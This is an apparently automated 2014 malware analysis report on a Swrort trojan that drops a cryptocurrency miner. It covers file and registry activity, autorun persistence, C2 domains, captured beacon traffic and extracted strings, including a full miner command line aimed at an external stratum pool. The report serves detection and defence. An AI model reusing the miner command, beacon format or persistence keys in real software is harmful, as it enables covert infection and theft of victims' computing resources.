Trojan.Win32.Swrort.3_204939cf63

by malwarelabrobot on July 9th, 2014 in Malware Descriptions.
Trojan.Win32.Chebri.jm (Kaspersky), Gen:Variant.Symmi.42922 (AdAware), Trojan.Win32.Swrort.3.FD, Trojan.Win32.Swrort.5.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan

This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.

MD5: 204939cf633f794950a64b42ef0088de
SHA1: c2ad31eb6e50f0eac6c6df2aa8334da720683eee
SHA256: 359fc8444f51630ffe613c5a1683e79126d4cf4de3312cf5840e3811ffbdd879
SSDeep: 1536:ug2DwhXt6GdnssmBhWGKdEfnReWUkANjq3PTepCv9czvIKsF5iDZkEdvisaE0g:/2M1p94TWGKdEEWcdkbepACzIKK5iDZB
Size: 95744 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 07:24:11
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

0003F.tmp.exe:1500
%original file name%.exe:1836

The Trojan injects its code into the following process(es):

%original file name%.exe:640
minerd.exe:364

Mutexes

The following mutexes were created/opened: No objects were found.

File activity

The process %original file name%.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (0 bytes)

Registry activity

The process 0003F.tmp.exe:1500 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WINSXS32"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WINSXS32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

The process %original file name%.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF B2 08 ED 19 F4 D8 3A 08 CE A1 F7 59 C7 2F 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To run itself automatically each time Windows boots, the Trojan adds the following value, pointing to its dropped file, to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 9C 07 5D EF F6 B5 55 E4 20 15 4E E3 EE 30 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402115051"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

The process minerd.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E 2B E0 B3 5E 71 F6 03 B0 96 15 E8 8A 93 8A"

Dropped PE files

MD5                               File path
b3b52fec86b2f0602e4ee6726cedb475  c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll
ac05fbba61f939cd90133032f2595c69  c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name      Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text     4096             39679         39936     4.49839   79a4a2e4dcaf9a3aeeee6e2782378240
.rdata    45056            16206         16384     3.62658   70c87e14c493e857c346d7b32c1713c4
.data     61440            19628         7680      4.01315   bfdf697f4ba0816dbcf9330733889a0a
.855645   81920            36            512       0.49456   4305edff9a269f78669d34a099c4bf1f
.41d3359  86016            36            512       0.495582  0d37efda672e26ceb5f6ff7e7ae2a1af
.c3a6f7   90112            4             512       0.056519  d46190223de12e4e4a1db0b9c8d15584
.rsrc     94208            28792         29184     4.76706   7282b099135755d52d4a881e04ea2936

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://carpetbrownsurface.com/index.php
hxxp://www5.0zz0.com/2014/05/28/22/846767599.png
hxxp://google.com/
hxxp://www.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
hxxp://www6.0zz0.com/2014/05/29/00/888256212.png
hxxp://www13.0zz0.com/2014/05/29/00/562309044.png

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response

Traffic

GET /2014/05/29/00/888256212.png HTTP/1.1
Host: www6.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:38 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:18 GMT
ETag: "d71032a-468a9-d67a3880"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png

GET /2014/05/29/00/562309044.png HTTP/1.1
Host: www13.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:37 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:44 GMT
ETag: "71702c3-468a9-d806f300"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: 4C9B53A8086004515190B6B74733CD51
Host: carpetbrownsurface.com
Content-Length: 175
Cache-Control: no-cache

0=D4DD6EBD91&1=0&2=A7BE76C69182033329D77E&3=B0BE2CF2D2B8134E4FBE0E8E3DAA&4=AF9D2FF6CCF5613439A12AC11ACB754E1F10368B349407C22F0E555EB6C25950F4E3DB52CCD4EF9C615AE3B0CEF613&5=&6=
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 03 Jul 2014 16:54:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u9

GET / HTTP/1.1
Host: google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
Content-Length: 258
Date: Thu, 03 Jul 2014 17:02:42 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf5
1oCQAw">here</A>...</BODY></HTML>....

GET /2014/05/28/22/846767599.png HTTP/1.1
Host: www5.0zz0.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:35 GMT
Server: Apache
Last-Modified: Wed, 28 May 2014 22:59:13 GMT
Accept-Ranges: bytes
Content-Length: 4608
Connection: close
Content-Type: image/png

GET /?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw HTTP/1.1
Host: VVV.google.ca
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=a925c378d21ce293:FF=0:TM=1404406962:LM=1404406962:S=KArret2NkGUXTIqS; expires=Sat, 02-Jul-2016 17:02:42 GMT; path=/; domain=.google.ca
Set-Cookie: NID=67=BoS7-YpbkZYYxrZzYwTQm7_Eq70VeqxwWULcrm4HbSYyV4u7QEL-lisxKUuFWiBmnSrvSwXutG5XPxcnG663bxQ6eFoPkEdaP9PFL7SOpMcZ5UeObC5efZKJkZtaXdfM; expires=Fri, 02-Jan-2015 17:02:42 GMT; path=/; domain=.google.ca; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked

The Trojan connects to the servers at the following location(s):

%original file name%.exe_640:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00330000_00004000:
.rdart
32.dl
2<3=4>5?6?7?8
ntdll.dll
%original file name%.exe_640_rwx_00340000_00021000:
.rdart
32.dl
2<3=4>5?6?7?8
%original file name%.exe_640_rwx_00370000_00033000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
AM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%original file name%.exe_640_rwx_00400000_00036000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00960000_00018000:
.text
`.rdata
@.data
.rsrc
314127.64
GetProcessWindowStation
ActivateKeyboardLayout
CreateDialogIndirectParamA
EnumChildWindows
EnumThreadWindows
EnumWindows
GetAsyncKeyState
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardState
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
SetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
ShellExecuteA
SHELL32.dll
OPENGL32.dll
CreateIoCompletionPort
GetCPInfo
KERNEL32.dll
u.vr-
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.
File %PayloadOne already exists,Invalid Handle, unable to complete operation
-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute
Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress
Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation
Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key
Key: %PayloadOne
Error: %error7Requested registry operation failed
Error: Invalid HiveJFailed to create the requested registry key
Error: %errorJFailed to delete the requested registry key
Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread
Error: Unsupported Bitness
`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?
Canceling Operation...
P/L or /lang  : Specifies a language to run the installer.R/L or /lang  : Specifies a language to run the installer.]/L or /lang  : Specifies a language to run the installer.F/L or /lang  : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).
minerd.exe_364:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@
minerd.exe_364_rwx_00400000_0004E000:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
